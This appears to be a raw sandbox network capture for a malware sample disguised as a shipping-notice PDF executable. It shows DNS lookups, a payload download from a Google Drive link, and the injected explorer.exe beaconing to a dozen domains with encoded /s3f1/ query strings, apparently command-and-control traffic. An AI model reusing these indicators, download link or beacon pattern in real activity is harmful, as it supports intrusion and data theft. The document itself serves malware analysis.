Nov 24, 2021 15:10:33.523464918 CET	9.9.9.9	192.168.11.20	0x9270	No error (0)	www.mvsteals.com	mvsteals.com		CNAME (Canonical name)	IN (0x0001)
Nov 24, 2021 15:10:33.523464918 CET	9.9.9.9	192.168.11.20	0x9270	No error (0)	mvsteals.com		34.102.136.180	A (IP address)	IN (0x0001)
Nov 24, 2021 15:10:54.092525959 CET	9.9.9.9	192.168.11.20	0xd418	No error (0)	www.thaicharuen.com		107.178.157.225	A (IP address)	IN (0x0001)
Nov 24, 2021 15:11:15.010298014 CET	9.9.9.9	192.168.11.20	0x63f9	Server failure (2)	www.eggchanceapple.top	none	none	A (IP address)	IN (0x0001)
Nov 24, 2021 15:11:16.060709000 CET	1.1.1.1	192.168.11.20	0x63f9	Server failure (2)	www.eggchanceapple.top	none	none	A (IP address)	IN (0x0001)
Nov 24, 2021 15:11:16.060782909 CET	1.1.1.1	192.168.11.20	0x63f9	Server failure (2)	www.eggchanceapple.top	none	none	A (IP address)	IN (0x0001)
Nov 24, 2021 15:11:36.566768885 CET	9.9.9.9	192.168.11.20	0x8cf	No error (0)	www.morningstarapparel.space	sites.teespring.com		CNAME (Canonical name)	IN (0x0001)
Nov 24, 2021 15:11:36.566768885 CET	9.9.9.9	192.168.11.20	0x8cf	No error (0)	sites.teespring.com	teespring.netlifyglobalcdn.com		CNAME (Canonical name)	IN (0x0001)
Nov 24, 2021 15:11:36.566768885 CET	9.9.9.9	192.168.11.20	0x8cf	No error (0)	teespring.netlifyglobalcdn.com		35.198.112.85	A (IP address)	IN (0x0001)
Nov 24, 2021 15:11:36.566768885 CET	9.9.9.9	192.168.11.20	0x8cf	No error (0)	teespring.netlifyglobalcdn.com		52.58.153.27	A (IP address)	IN (0x0001)
Nov 24, 2021 15:11:54.886133909 CET	9.9.9.9	192.168.11.20	0x55cf	Name error (3)	www.facebook-meta-morphosis.com	none	none	A (IP address)	IN (0x0001)
Nov 24, 2021 15:12:17.348529100 CET	9.9.9.9	192.168.11.20	0x4cf5	No error (0)	www.soarlikeaneagle.site	soarlikeaneagle.site		CNAME (Canonical name)	IN (0x0001)
Nov 24, 2021 15:12:17.348529100 CET	9.9.9.9	192.168.11.20	0x4cf5	No error (0)	soarlikeaneagle.site		70.40.220.123	A (IP address)	IN (0x0001)
Nov 24, 2021 15:12:36.064073086 CET	9.9.9.9	192.168.11.20	0x1950	No error (0)	www.evaccines.com		3.64.163.50	A (IP address)	IN (0x0001)
Nov 24, 2021 15:12:58.254039049 CET	9.9.9.9	192.168.11.20	0xb3	Name error (3)	www.bncmobile.com	none	none	A (IP address)	IN (0x0001)
Nov 24, 2021 15:13:18.859294891 CET	9.9.9.9	192.168.11.20	0xfc85	No error (0)	www.celsb.com		154.94.229.8	A (IP address)	IN (0x0001)
Nov 24, 2021 15:13:37.450122118 CET	9.9.9.9	192.168.11.20	0xac31	Name error (3)	www.papllc.biz	none	none	A (IP address)	IN (0x0001)
Nov 24, 2021 15:14:11.059653997 CET	9.9.9.9	192.168.11.20	0xffdf	Name error (3)	www.bncmobile.com	none	none	A (IP address)	IN (0x0001)
Nov 24, 2021 15:14:13.205045938 CET	9.9.9.9	192.168.11.20	0xe8c0	No error (0)	www.4mtechmachines.com	4mtechmachines.com		CNAME (Canonical name)	IN (0x0001)
Nov 24, 2021 15:14:13.205045938 CET	9.9.9.9	192.168.11.20	0xe8c0	No error (0)	4mtechmachines.com		184.168.98.97	A (IP address)	IN (0x0001)
Nov 24, 2021 15:14:33.995456934 CET	9.9.9.9	192.168.11.20	0x5ef3	No error (0)	www.hara.cloud	hara.cloud		CNAME (Canonical name)	IN (0x0001)
Nov 24, 2021 15:14:33.995456934 CET	9.9.9.9	192.168.11.20	0x5ef3	No error (0)	hara.cloud		34.102.136.180	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

drive.google.com

doc-14-5s-docs.googleusercontent.com

www.izivente.com

www.musee-radix-hairsalon.com

www.teslafreesuperchargermiles.com

www.mvsteals.com

www.thaicharuen.com

www.morningstarapparel.space

www.soarlikeaneagle.site

www.evaccines.com

www.celsb.com

www.4mtechmachines.com

www.hara.cloud

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49805	142.250.185.110	443	C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49806	142.250.186.97	443	C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.11.20	49824	154.94.229.8	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2021 15:13:19.042143106 CET	473	OUT	GET /s3f1/?0v=NBR0aPdzKjxBJ/qIBF///end99Hz3MSBKbZXqSBgBb5XrtkET9he0lXIERUBepCdWUFS&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 Host: www.celsb.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 24, 2021 15:13:19.224543095 CET	473	IN	HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Server: Nginx Microsoft-HTTPAPI/2.0 X-Powered-By: Nginx Date: Wed, 24 Nov 2021 14:13:15 GMT Connection: close Data Raw: 33 0d 0a ef bb bf 0d 0a Data Ascii: 3
Nov 24, 2021 15:13:19.224632025 CET	475	IN	Data Raw: 31 30 37 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 61 70 70 6c 69 63 61 62 6c 65 2d 64 Data Ascii: 1070<!DOCTYPE html><html><head><meta charset=UTF-8 /><meta name=applicable-device content=pc,mobile /><meta name=viewport content="width=device-width, initial-scale=1" /><style>body{margin:0;padding:0;background:#e6eaeb;font-family:Ari
Nov 24, 2021 15:13:19.224698067 CET	476	IN	Data Raw: 6c 65 72 74 2d 66 6f 6f 74 65 72 2d 74 65 78 74 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 32 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 70 61 64 64 69 6e 67 3a 33 70 78 20 30 20 30 20 35 70 78 3b 68 65 69 67 68 74 3a Data Ascii: lert-footer-text{float:left;border-left:2px solid #eee;padding:3px 0 0 5px;height:40px;color:#0b85cc;font-size:12px;text-align:left}.alert-footer-text p{color:#7a7a7a;font-size:22px;line-height:18px}</style> </head><body class=ie8><div i
Nov 24, 2021 15:13:19.224760056 CET	478	IN	Data Raw: 46 65 6e 6e 65 63 7c 77 4f 53 42 72 6f 77 73 65 72 7c 42 72 6f 77 73 65 72 4e 47 7c 57 65 62 4f 53 7c 53 79 6d 62 69 61 6e 7c 57 69 6e 64 6f 77 73 20 50 68 6f 6e 65 29 2f 69 29 29 29 20 7b 0a 09 09 20 20 20 20 20 20 20 20 77 65 62 75 72 6c 20 3d Data Ascii: Fennec\|wOSBrowser\|BrowserNG\|WebOS\|Symbian\|Windows Phone)/i))) { weburl = weburl.replace(/\/\/(www\.)*/, '//m.'); } document.getElementById("js-alert-btn").setAttribute("href", weburl); var levelTime = 100;var t
Nov 24, 2021 15:13:19.224808931 CET	478	IN	Data Raw: 09 09 09 0a 09 09 09 09 09 09 7d 0a 09 09 09 0a 09 09 09 09 09 09 6e 2e 73 74 79 6c 65 2e 73 74 72 6f 6b 65 44 61 73 68 6f 66 66 73 65 74 20 3d 20 37 33 35 20 2d 20 6c 76 3b 0a 09 09 09 09 09 09 69 66 20 28 6c 65 76 65 6c 54 69 6d 65 20 3d 3d 20 Data Ascii: }n.style.strokeDashoffset = 735 - lv;if (levelTime == 0) {document.getElementById("js-alert-head").innerHTML = str2;} }

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.11.20	49826	184.168.98.97	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2021 15:14:13.467587948 CET	486	OUT	GET /s3f1/?0v=d8/OqiJyMkDaGTNTMgoxgiTtJv1BTsaVDDjuqFtpNub02Pcaaru29SvOabQgh8wWKZWy&hXeT=Wxlp HTTP/1.1 Host: www.4mtechmachines.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 24, 2021 15:14:13.770452976 CET	486	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2021 14:14:13 GMT Server: Apache X-Powered-By: PHP/7.4.25 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Upgrade: h2,h2c Connection: Upgrade, close Location: http://4mtechmachines.com/s3f1/?0v=d8/OqiJyMkDaGTNTMgoxgiTtJv1BTsaVDDjuqFtpNub02Pcaaru29SvOabQgh8wWKZWy&hXeT=Wxlp Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.11.20	49827	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2021 15:14:34.005657911 CET	487	OUT	GET /s3f1/?0v=F/pbsBegFO7o3fLKo/FzEC9ZwTRXzaIgUSgpsvNThmOurZQxU5rRi5MGW6g3EwPdsbP6&hXeT=Wxlp HTTP/1.1 Host: www.hara.cloud Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 24, 2021 15:14:34.176235914 CET	488	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 24 Nov 2021 14:14:34 GMT Content-Type: text/html Content-Length: 275 ETag: "61951b77-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.11.20	49810	64.190.62.111	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2021 15:08:31.472445011 CET	414	OUT	GET /s3f1/?0v=PTZX9bbDrHz+cSGvcymGk0mts24461Z1qQ1nyKxozOrcJ62jRcnhMEjPJVIjYEdLVzgY&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 Host: www.izivente.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 24, 2021 15:08:31.512696981 CET	415	IN	HTTP/1.1 302 Found date: Wed, 24 Nov 2021 14:08:31 GMT content-type: text/html; charset=UTF-8 content-length: 0 x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_gk1FjG1Y57VvIG87+WRL2HOiu2y21MjA99GeT6pOEitNR09XLBGEOJtaxdqUQeHWa27wZf2qNMgXs/9+/N20Qw== expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache last-modified: Wed, 24 Nov 2021 14:08:31 GMT location: https://sedo.com/search/details/?partnerid=324561&language=e&domain=izivente.com&origin=sales_lander_5&utm_medium=Parking&utm_campaign=offerpage x-cache-miss-from: parking-7bcb4688fc-j7978 server: NginX connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.11.20	49814	183.181.99.12	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2021 15:09:34.156372070 CET	442	OUT	GET /s3f1/?0v=djAV39Fd+2tTaJZ0vMg9wx3f2dAzn5uoNnRL0R1SzoIuCwqtHRucI/njP/LN+anlykG6&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 Host: www.musee-radix-hairsalon.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 24, 2021 15:09:34.611287117 CET	443	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 24 Nov 2021 14:09:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: https://www.musee-radix-hairsalon.com/s3f1/?0v=djAV39Fd+2tTaJZ0vMg9wx3f2dAzn5uoNnRL0R1SzoIuCwqtHRucI/njP/LN+anlykG6&kTGXE2=5jpDxBr8jNJ0VnGP

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.11.20	49816	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2021 15:09:52.881081104 CET	450	OUT	GET /s3f1/?0v=sqInqd/J1oF05xIRIYy6fIocxGbhQvf/UJ8WsTvvwcutrQRehAYuBiNZHMXnLC/ELIDP&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 Host: www.teslafreesuperchargermiles.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 24, 2021 15:09:53.115041971 CET	450	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 24 Nov 2021 14:09:53 GMT Content-Type: text/html Content-Length: 275 ETag: "6197bde3-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.11.20	49818	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2021 15:10:33.535449982 CET	458	OUT	GET /s3f1/?0v=SHCw80AJpwYBr9Gcy19d9t3wNH3OULHDJ3WoL9xOYwR6hbrNjBBxIJP5Ay3SVk+aC6rM&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 Host: www.mvsteals.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 24, 2021 15:10:33.708120108 CET	459	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 24 Nov 2021 14:10:33 GMT Content-Type: text/html Content-Length: 275 ETag: "618be74a-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.11.20	49819	107.178.157.225	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2021 15:10:54.274463892 CET	459	OUT	GET /s3f1/?0v=mH/60k+8QaINko6jE2QpZl5PE74OV+HVH/ClSiWHQSmVZS7BQfRqR+Cg+8qmWPEHLuT3&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 Host: www.thaicharuen.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.11.20	49821	35.198.112.85	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2021 15:11:36.580027103 CET	468	OUT	GET /s3f1/?0v=UFnETU8dieTu408infxPFcIZ9A51JABruIfjxtzTo70f1rUHWxHKXlzNhsAQN9Kxpi4c&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 Host: www.morningstarapparel.space Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 24, 2021 15:11:36.749105930 CET	468	IN	HTTP/1.1 301 Moved Permanently cache-control: public, max-age=0, must-revalidate content-length: 58 content-type: text/plain date: Wed, 24 Nov 2021 14:11:36 GMT age: 0 location: https://www.morningstarapparel.space/s3f1/?0v=UFnETU8dieTu408infxPFcIZ9A51JABruIfjxtzTo70f1rUHWxHKXlzNhsAQN9Kxpi4c&kTGXE2=5jpDxBr8jNJ0VnGP x-nf-request-id: 01FN94K80BGZ7XXDH5V7C82BDN server: Netlify Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 6f 72 6e 69 6e 67 73 74 61 72 61 70 70 61 72 65 6c 2e 73 70 61 63 65 2f 73 33 66 31 2f 0a Data Ascii: Redirecting to https://www.morningstarapparel.space/s3f1/

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.11.20	49822	70.40.220.123	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2021 15:12:17.503062010 CET	470	OUT	GET /s3f1/?0v=09o28MjQy1cZQ5Pjj+CLcbQvMAiWJGV2Uxg7+ScaYTXEQUafs3S8SGgaduHkLU6DHZH5&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 Host: www.soarlikeaneagle.site Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 24, 2021 15:12:17.663027048 CET	470	IN	HTTP/1.1 404 Not Found Date: Wed, 24 Nov 2021 14:12:17 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.11.20	49823	3.64.163.50	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2021 15:12:36.076911926 CET	471	OUT	GET /s3f1/?0v=mbzqDKJ3zGVZXRXzBR45Cgdnnesr2+nRJSwniRIMGUaPxNPQA+ji5LfWApDcm/CqO18J&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 Host: www.evaccines.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 24, 2021 15:12:36.088320017 CET	472	IN	HTTP/1.1 410 Gone Server: openresty Date: Wed, 24 Nov 2021 14:12:22 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 64 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 65 76 61 63 63 69 6e 65 73 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 39 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 65 76 61 63 63 69 6e 65 73 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>4d <meta http-equiv='refresh' content='5; url=http://www.evaccines.com/' />a </head>9 <body>39 You are being redirected to http://www.evaccines.coma </body>8</html>0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49805	142.250.185.110	443	C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-24 14:07:31 UTC	0	OUT	GET /uc?export=download&id=16igyruBeyi1SLH2lfqbjS2ggty9bFGFC HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
2021-11-24 14:07:32 UTC	0	IN	HTTP/1.1 302 Moved Temporarily Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 24 Nov 2021 14:07:32 GMT Location: https://doc-14-5s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nqfdtgt678la5ha3g2tbhed40e9h4e57/1637762850000/13904828925096904893/*/16igyruBeyi1SLH2lfqbjS2ggty9bFGFC?e=download P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]} Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq" Content-Security-Policy: script-src 'nonce-8Nz1aj+dRslqOdTYTWipqw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/ X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Set-Cookie: NID=511=qDoaMAIU0O04ihPSnMFUKHKhZjD_5Vibr7Nm30ISQliCoezrNDEf4HL2Sn7XymRTaJwq-jn_BUnRoCmfDMdRD-BZ6Ji3pgJOij0Ebs8oId5kwa6xLQ8z0exq8NTnHnMmjAH_19djgXOVXfCRMw2vQKWMSmn_f_EDO5yvU-mdf8g; expires=Thu, 26-May-2022 14:07:31 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2021-11-24 14:07:32 UTC	1	IN	Data Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 31 34 2d 35 73 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 6e 71 66 64 Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-14-5s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nqfd
2021-11-24 14:07:32 UTC	2	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
